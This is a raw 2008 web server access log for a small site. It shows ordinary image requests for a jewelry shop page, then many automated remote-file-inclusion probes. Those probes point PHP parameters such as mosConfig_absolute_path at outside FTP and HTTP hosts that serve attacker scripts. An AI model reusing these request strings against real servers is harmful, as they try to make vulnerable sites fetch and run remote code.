204.108.65.10 - - [12/Feb/2008:08:55:35 -0800] "GET /minamijewelry/html/images/wind_lg.jpg HTTP/1.1" 200 2770 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:35 -0800] "GET /minamijewelry/html/images/moon_lg.jpg HTTP/1.1" 200 2777 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:35 -0800] "GET /minamijewelry/html/images/dream_lg.jpg HTTP/1.1" 200 2881 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:35 -0800] "GET /minamijewelry/html/images/home_nav.jpg HTTP/1.1" 200 1079 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:35 -0800] "GET /minamijewelry/html/images/home_nav_mos.jpg HTTP/1.1" 200 1148 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:36 -0800] "GET /minamijewelry/html/images/begin_shopping_nav.jpg HTTP/1.1" 200 1633 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:36 -0800] "GET /minamijewelry/html/images/begin_shopping_nav_mos.jpg HTTP/1.1" 200 1673 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:36 -0800] "GET /minamijewelry/html/images/about_designer_nav.jpg HTTP/1.1" 200 1543 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:36 -0800] "GET /minamijewelry/html/images/about_designer_nav_mos.jpg HTTP/1.1" 200 1608 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:36 -0800] "GET /minamijewelry/html/images/custom_made_nav.jpg HTTP/1.1" 200 1431 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:36 -0800] "GET /minamijewelry/html/images/custom_made_nav_mos.jpg HTTP/1.1" 200 1496 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:36 -0800] "GET /minamijewelry/html/images/clearance_nav.jpg HTTP/1.1" 200 1278 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:36 -0800] "GET /minamijewelry/html/images/return_policy_nav.jpg HTTP/1.1" 200 1447 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:36 -0800] "GET /minamijewelry/html/images/clearance_nav_mos.jpg HTTP/1.1" 200 1344 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:37 -0800] "GET /minamijewelry/html/images/return_policy_nav_mos.jpg HTTP/1.1" 200 1513 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:37 -0800] "GET /minamijewelry/html/images/testimonials_nav.jpg HTTP/1.1" 200 1376 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:37 -0800] "GET /minamijewelry/html/images/testimonials_nav_mos.jpg HTTP/1.1" 200 1465 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:37 -0800] "GET /minamijewelry/html/images/contact_us_nav.jpg HTTP/1.1" 200 1307 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:37 -0800] "GET /minamijewelry/html/images/contact_us_nav_mos.jpg HTTP/1.1" 200 1374 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:37 -0800] "GET /minamijewelry/html/images/terms_nav.jpg HTTP/1.1" 200 986 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:38 -0800] "GET /minamijewelry/html/images/terms_nav_mos.jpg HTTP/1.1" 200 1068 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:38 -0800] "GET /minamijewelry/html/images/bg_color.jpg HTTP/1.1" 200 542 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:38 -0800] "GET /minamijewelry/html/images/view_cart_button.jpg HTTP/1.1" 200 1628 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:38 -0800] "GET /minamijewelry/html/images/add_cart_button.jpg HTTP/1.1" 200 1713 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:38 -0800] "GET /minamijewelry/html/images/kids_nav.jpg HTTP/1.1" 200 1309 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:38 -0800] "GET /minamijewelry/html/images/kids_nav_mos.jpg HTTP/1.1" 200 1398 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:38 -0800] "GET /minamijewelry/html/images/schedule_nav.jpg HTTP/1.1" 200 1156 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:38 -0800] "GET /minamijewelry/html/images/schedule_nav_mos.jpg HTTP/1.1" 200 1245 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:38 -0800] "GET /minamijewelry/html/images/flower_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:38 -0800] "GET /minamijewelry/html/images/flower_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:38 -0800] "GET /minamijewelry/html/images/bird_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:38 -0800] "GET /minamijewelry/html/images/bird_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:39 -0800] "GET /minamijewelry/html/images/wind_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:39 -0800] "GET /minamijewelry/html/images/wind_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:39 -0800] "GET /minamijewelry/html/images/moon_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:39 -0800] "GET /minamijewelry/html/images/moon_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:39 -0800] "GET /minamijewelry/html/images/dream_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:39 -0800] "GET /minamijewelry/html/images/dream_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:39 -0800] "GET /minamijewelry/html/images/main.jpg HTTP/1.1" 200 19269 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:39 -0800] "GET /minamijewelry/html/images/lft_border.jpg HTTP/1.1" 200 1102 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:39 -0800] "GET /minamijewelry/html/images/jewelry/flower.jpg HTTP/1.1" 200 6031 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:41 -0800] "GET /minamijewelry/html/images/jewelry/bird.jpg HTTP/1.1" 200 6518 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:42 -0800] "GET /minamijewelry/html/images/jewelry/moon.jpg HTTP/1.1" 200 5049 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:42 -0800] "GET /minamijewelry/html/images/jewelry/dream.jpg HTTP/1.1" 200 5528 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:43 -0800] "GET /minamijewelry/html/image/bg_color.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:43 -0800] "GET /minamijewelry/html/images/rt_border.jpg HTTP/1.1" 200 1012 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
204.108.65.10 - - [12/Feb/2008:08:55:43 -0800] "GET /minamijewelry/html/images/bottom_border.jpg HTTP/1.1" 200 1869 "http://www.dmulk.com/minamijewelry/html/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
212.227.49.142 - - [12/Feb/2008:08:55:46 -0800] "GET /logs/access_080131.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.49.142 - - [12/Feb/2008:08:55:46 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.112.154.17 - - [12/Feb/2008:08:55:46 -0800] "GET /logs/access_080117.log/book.php5?page=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.227.49.142 - - [12/Feb/2008:08:55:47 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.112.154.17 - - [12/Feb/2008:08:55:47 -0800] "GET /book.php5?page=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.112.154.17 - - [12/Feb/2008:08:55:47 -0800] "GET /logs/book.php5?page=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:08:56:43 -0800] "GET /logs/access_080117.log/book.php5?page=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:08:56:43 -0800] "GET /book.php5?page=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:08:56:43 -0800] "GET /logs/book.php5?page=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [12/Feb/2008:08:57:14 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [12/Feb/2008:08:57:14 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [12/Feb/2008:08:57:14 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.89.137.99 - - [12/Feb/2008:08:57:19 -0800] "GET /logs/access_080122.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [12/Feb/2008:08:57:19 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.222 - - [12/Feb/2008:08:57:39 -0800] "GET /mobileoffice/?S=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.89.137.99 - - [12/Feb/2008:08:58:15 -0800] "GET /logs/access_080131.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [12/Feb/2008:08:59:25 -0800] "GET /logs/access_080122.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [12/Feb/2008:08:59:25 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.23 - - [12/Feb/2008:08:59:39 -0800] "GET /mobileoffice/?M=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
12.162.162.251 - - [12/Feb/2008:08:59:57 -0800] "GET /logs//header.php?loc=http://ineal.biz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [12/Feb/2008:08:59:58 -0800] "GET //header.php?loc=http://ineal.biz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.89.137.99 - - [12/Feb/2008:09:00:17 -0800] "GET /logs/access_080131.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.65.116.80 - - [12/Feb/2008:09:01:39 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [12/Feb/2008:09:01:39 -0800] "GET /errors.php?error=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [12/Feb/2008:09:01:42 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [12/Feb/2008:09:01:42 -0800] "GET /errors.php?error=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
212.227.49.142 - - [12/Feb/2008:09:03:33 -0800] "GET //login.php?dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:09:03:38 -0800] "GET /logs/str.php?lang=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:09:03:39 -0800] "GET /str.php?lang=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
74.6.29.45 - - [12/Feb/2008:09:03:55 -0800] "GET /logs/access_080202.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:09:04:16 -0800] "GET //help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:09:04:17 -0800] "GET /logs//help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
212.227.49.142 - - [12/Feb/2008:09:05:11 -0800] "GET /logs/access_080131.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.49.142 - - [12/Feb/2008:09:05:12 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.49.142 - - [12/Feb/2008:09:05:12 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.49.142 - - [12/Feb/2008:09:05:43 -0800] "GET /logs/access_080201.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.151.103.27 - - [12/Feb/2008:09:06:43 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.250.2.37 - - [12/Feb/2008:09:06:45 -0800] "GET /str.php?page=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
74.6.22.19 - - [12/Feb/2008:09:09:25 -0800] "GET /logs/access_070829.log HTTP/1.0" 200 34921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.149.90.29 - - [12/Feb/2008:09:11:24 -0800] "GET /account.php?action=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
83.149.90.29 - - [12/Feb/2008:09:11:30 -0800] "GET /logs/account.php?action=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
62.112.154.17 - - [12/Feb/2008:09:14:19 -0800] "GET /logs/access_080117.log/book.php5?page=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.112.154.17 - - [12/Feb/2008:09:14:19 -0800] "GET /book.php5?page=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.112.154.17 - - [12/Feb/2008:09:14:20 -0800] "GET /logs/book.php5?page=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:09:14:38 -0800] "GET /logs/access_080108.log/joomla/index.php?option=com_restaurante&task=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:09:14:38 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [12/Feb/2008:09:14:38 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.230 - - [12/Feb/2008:09:14:55 -0800] "GET /minamijewelry/?M=D HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:09:15:05 -0800] "GET /logs/access_080117.log/book.php5?page=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:09:15:05 -0800] "GET /book.php5?page=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:09:15:05 -0800] "GET /logs/book.php5?page=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:09:15:07 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.89.137.99 - - [12/Feb/2008:09:15:25 -0800] "GET /logs/access_080122.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [12/Feb/2008:09:15:25 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [12/Feb/2008:09:15:25 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [12/Feb/2008:09:15:26 -0800] "GET /logs/access_080130.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.49.142 - - [12/Feb/2008:09:15:37 -0800] "GET /logs/access_080131.log//login.php?dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.49.142 - - [12/Feb/2008:09:15:37 -0800] "GET /logs//login.php?dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.49.142 - - [12/Feb/2008:09:15:41 -0800] "GET /logs/access_080201.log//login.php?dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.184.96.158 - - [12/Feb/2008:09:16:31 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://cfemp.com/flash/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
216.184.96.158 - - [12/Feb/2008:09:16:32 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://cfemp.com/flash/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:09:18:40 -0800] "GET /logs//sub.php?s=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:09:18:41 -0800] "GET //sub.php?s=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
200.29.0.28 - - [12/Feb/2008:09:18:59 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:09:19:44 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
